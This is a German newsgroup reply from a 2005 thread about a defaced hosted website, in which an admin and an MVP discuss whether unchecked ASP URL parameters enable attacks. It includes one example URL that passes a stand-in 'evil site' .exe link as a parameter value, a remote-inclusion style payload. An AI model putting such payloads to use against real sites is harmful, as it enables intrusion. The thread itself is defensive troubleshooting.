Re: Fatal Error ownz you
- From: "Christian" <ch.g@xxxxxxxxxxx>
- Date: Fri, 4 Nov 2005 23:31:10 +0100
Hallo,
jetzt hast du mich etwas durcheinander gebracht.
"Olaf Lüder [MVP]" <olnews@xxxxxxxxxx> schrieb im Newsbeitrag
news:665ec34397c3f6482672a840f8711032@xxxxxxxxxxxxx
> Hallo,
>
>> Was findest du von dieser URL?
>> http://www.trace-keeper.ch/default.asp?reflang=http://www.meineboeseseite.ch/meinboesescript.exe
>>
>> Den Original Link findest du unter 'Switch to English'.
>
> Hmmm, generell sollte das ja noch nicht direkt ein Problem darstellen - Du
> wirst den Weret des Parameters ja nicht als URL interpretieren, die Datei
> auf den Server laden und dann auch noch ausführen, oder?
Ich nicht, aber diejenige Person die attackiert hat. Nimm mal an, ich wäre
der Attackierer und führe oben genannten Link aus. Lädt der IIS die Datei
meinboesescript.exe auf den Server und führt dann die darin enthaltenen
funktionen aus? z.B. ein Remotekonsolenserver, welcher es dem Attackierer
erlaubt über den Port xxxx als Benutzer web000 (unter diesem Benutzer läuft
die Webseite) auf den Server zuzugreifen oder vielleicht ein kleines Script
welches automatisch die Rootverzeichnisse sucht und dann die index Seiten
erstellt?
>
>> Wenn es mit dem oben genannten Link möglich ist, so eine .exe Datei
>> auszuführen, welche dann die Dateien in das Verzeichniss schreibt, dann
>> hab ich wohl das Problem höchstwahrscheindlich gefunden.
>
> Ganz so einfach ist das nicht möglich; wenn Du mit dem ungeprüften Wert
> des Parameters aber z.B. eine SQL-String zusammensetzt und an eine
> SQL-Server-Datenbank schickst, wäre das (entsprechende DB-Rechte
> vorausgesetzt), prinzipiell schon möglich - etwas komplexer wäre der
> Parametr aber schon...
Das ist mir jetzt zu kompliziert um es zu verstehen. Vielleicht ist die
ganze Sache doch einiges komplizierter, als wie ich es mir vorstelle.
Vielleicht sollte ich doch warten, bis jemand anderes das Problem gefunden
hat. Schliesslich werden pro Tag einige Hundert Seiten von diesen Jungs
attackiert.
>
>> Kann man wie bei einem bekannten P*P Problem die Werte für reflang auf
>> eine bestimme Zeichenlänge minimieren (Z.B. das der Wert reflang nur
>> maximal 5 Zeichen lang sein darf?) oder sogar Systemweit, den Zugriff für
>> Variablen auf externe URLs unterbinden?
>
> Pauschal geht das unter (classic) ASP nicht; Du solltest generell allen
> Werten, die von außen kommen, mißtrauen und diese überprüfen - das mußt Du
> aber für jeden Wert einzeln machen.
Das wäre dann die Aufgabe des Webseitenbetreibers / Admin und nicht direkt
das Problem des Hosters.... Ich kann aber mal die Source anschauen und mal
gucken ob der Kunde die Variable limitiert hat. Aber wenn der IIS so oder
so, die URL dann nicht folgt und das File auch ausführt, sollte es ja keine
grosse Rollespielen
Grüsse
Christian
.
- Follow-Ups:
- Re: Fatal Error ownz you
- From: Olaf Lüder [MVP]
- Re: Fatal Error ownz you
- References:
- Fatal Error ownz you
- From: Chrigiboy
- Re: Fatal Error ownz you
- From: Chrigiboy
- Re: Fatal Error ownz you
- From: Stefan Falz [MVP]
- Re: Fatal Error ownz you
- From: Christian
- Re: Fatal Error ownz you
- From: Stefan Falz [MVP]
- Re: Fatal Error ownz you
- From: Christian
- Re: Fatal Error ownz you
- From: Olaf Lüder [MVP]
- Re: Fatal Error ownz you
- From: Christian
- Re: Fatal Error ownz you
- From: Olaf Lüder [MVP]
- Fatal Error ownz you
- Prev by Date: Re: Fatal Error ownz you
- Next by Date: Re: Fatal Error ownz you
- Previous by thread: Re: Fatal Error ownz you
- Next by thread: Re: Fatal Error ownz you
- Index(es):
Relevant Pages
|
